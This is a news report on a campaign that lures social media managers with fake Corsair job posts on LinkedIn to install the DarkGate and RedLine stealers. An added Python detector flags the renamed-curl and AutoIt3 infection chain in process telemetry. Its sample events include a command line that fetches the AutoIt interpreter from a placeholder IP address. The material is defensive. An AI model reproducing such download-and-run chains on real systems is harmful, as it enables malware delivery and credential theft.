A threat actor is using fake LinkedIn posts and direct messages advertising a Facebook Ads specialist position at hardware maker Corsair to lure people into downloading information-stealing malware such as DarkGate and RedLine.

Cybersecurity company WithSecure detected and tracked the activity, and in a report published today links it to the Vietnamese cybercriminal groups behind the 'Ducktail' campaigns first spotted last year. Those campaigns aim to hijack valuable Facebook business accounts that can be used for malvertising or sold to other cybercriminals.

DarkGate was first spotted in 2017, but its deployment remained limited until June 2023, when its author began selling access to the malware to a wider audience. Recent examples of its use include phishing attacks over Microsoft Teams that push the payload, and compromised Skype accounts used to send VBS scripts that trigger an infection chain ending in DarkGate.

The Vietnamese threat actors mainly targeted users in the U.S., the U.K., and India who hold social media management positions and are therefore likely to have access to Facebook business accounts.

WithSecure researchers analyzed the metadata of the malicious files and found leads pointing to RedLine stealer distribution as well.

The downloaded archive contains a VBS script, possibly embedded in the DOCX file, that copies 'curl.exe' to a new location under a different name and uses it to download the AutoIt interpreter, 'autoit3.exe', together with an AutoIt script. The executable launches the script, which de-obfuscates itself and constructs the DarkGate payload from strings embedded in the script. Thirty seconds after installation the malware attempts to uninstall security products from the compromised system, indicating an automated process.

LinkedIn introduced features late last year to fight abuse on the platform that can help users determine whether an account is suspicious or fake. It falls on users to check the verified information before engaging with a new account.
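The infection chain above (a script host launching a renamed copy of curl.exe to fetch the AutoIt interpreter, then AutoIt3 running an obfuscated script from a user-writable directory) leaves a recognisable footprint in process-creation telemetry. The following is an added example, not code from WithSecure or from the article: a small detector over Sysmon Event ID 1 style records, using the OriginalFileName field (which survives a rename of the file on disk) to spot curl running under another name. The event records, paths, file names and the 203.0.113.10 address are constructed samples; the script-host parents, the user-writable directory patterns and the .au3/.a3x extensions are assumptions of this example.

```python
"""Detect the renamed-curl -> AutoIt3 delivery chain in process-creation events.

Added example; field names mirror Sysmon Event ID 1 (Image, OriginalFileName,
ParentImage, CommandLine). All sample data below is constructed.
"""
import re
from dataclasses import dataclass

# Script hosts that would run the VBS dropper (assumption for this example).
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}

# Directories a low-privilege user can write to (assumption; extend as needed).
USER_WRITABLE = re.compile(
    r"\\(Users\\[^\\]+\\AppData|Users\\Public|Windows\\Temp|ProgramData)\\", re.I
)


@dataclass(frozen=True)
class ProcEvent:
    image: str              # full path of the new process
    original_file_name: str  # OriginalFileName from the PE version resource
    parent_image: str       # full path of the parent process
    command_line: str


def basename(path: str) -> str:
    """Lower-cased file name component of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(event: ProcEvent) -> list:
    """Return the alert names this single event triggers (empty list if none)."""
    alerts = []
    img = basename(event.image)
    parent = basename(event.parent_image)
    orig = event.original_file_name.lower()
    cmd = event.command_line

    # Stage 1: curl.exe copied and renamed by the VBS script. The on-disk name
    # changes, but OriginalFileName still says curl.exe.
    if orig == "curl.exe" and img != "curl.exe":
        alerts.append("renamed_curl")
        if parent in SCRIPT_HOSTS and re.search(r"https?://", cmd, re.I):
            alerts.append("script_host_renamed_curl_download")

    # Stage 2: the AutoIt interpreter dropped into a user-writable directory and
    # handed an AutoIt script, and/or started directly by the script host.
    if orig == "autoit3.exe" or img == "autoit3.exe":
        if USER_WRITABLE.search(event.image) and re.search(r"\.(au3|a3x)\b", cmd, re.I):
            alerts.append("autoit_from_user_writable_dir")
        if parent in SCRIPT_HOSTS:
            alerts.append("script_host_spawns_autoit")

    return alerts


def scan(events) -> dict:
    """Map event index -> alerts for every event that triggered at least one."""
    results = {}
    for idx, event in enumerate(events):
        hits = detect(event)
        if hits:
            results[idx] = hits
    return results


# Constructed sample telemetry (hypothetical paths and a TEST-NET-3 address).
SAMPLE_EVENTS = [
    # benign: curl under its own name, run from a terminal
    ProcEvent(r"C:\Windows\System32\curl.exe", "curl.exe",
              r"C:\Windows\System32\cmd.exe",
              "curl.exe https://example.com/health"),
    # stage 1: wscript runs a renamed curl copy to fetch the AutoIt interpreter
    ProcEvent(r"C:\Users\alice\AppData\Local\Temp\winupd.exe", "curl.exe",
              r"C:\Windows\System32\wscript.exe",
              r"winupd.exe -o C:\Users\alice\AppData\Local\Temp\autoit3.exe "
              r"http://203.0.113.10/autoit3.exe"),
    # stage 2: AutoIt3 started by wscript from Temp with the obfuscated script
    ProcEvent(r"C:\Users\alice\AppData\Local\Temp\autoit3.exe", "AutoIt3.exe",
              r"C:\Windows\System32\wscript.exe",
              r"autoit3.exe C:\Users\alice\AppData\Local\Temp\script.au3"),
    # benign: a developer runs AutoIt3 from its install directory via Explorer
    ProcEvent(r"C:\Program Files (x86)\AutoIt3\AutoIt3.exe", "AutoIt3.exe",
              r"C:\Windows\explorer.exe",
              r"AutoIt3.exe C:\dev\build.au3"),
]


if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS).items():
        print(f"event {idx}: {', '.join(hits)}")
```

The two benign records produce no alerts: curl under its own name is ordinary, and AutoIt3 launched from Program Files by Explorer has neither a script-host parent nor a user-writable image path. In a real deployment the 30-second uninstall behaviour described in the report is a second, independent signal (a service or uninstaller for a security product being invoked shortly after the AutoIt3 process starts) that can be correlated with these alerts.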
WithSecure has released a list of indicators of compromise that could help organizations defend against activity from this threat actor. The details include IP addresses, domains, URLs, file metadata, and archive names.
This Cyber News was published on www.bleepingcomputer.com. Publication date: Thu, 30 Nov 2023 23:19:27 +0000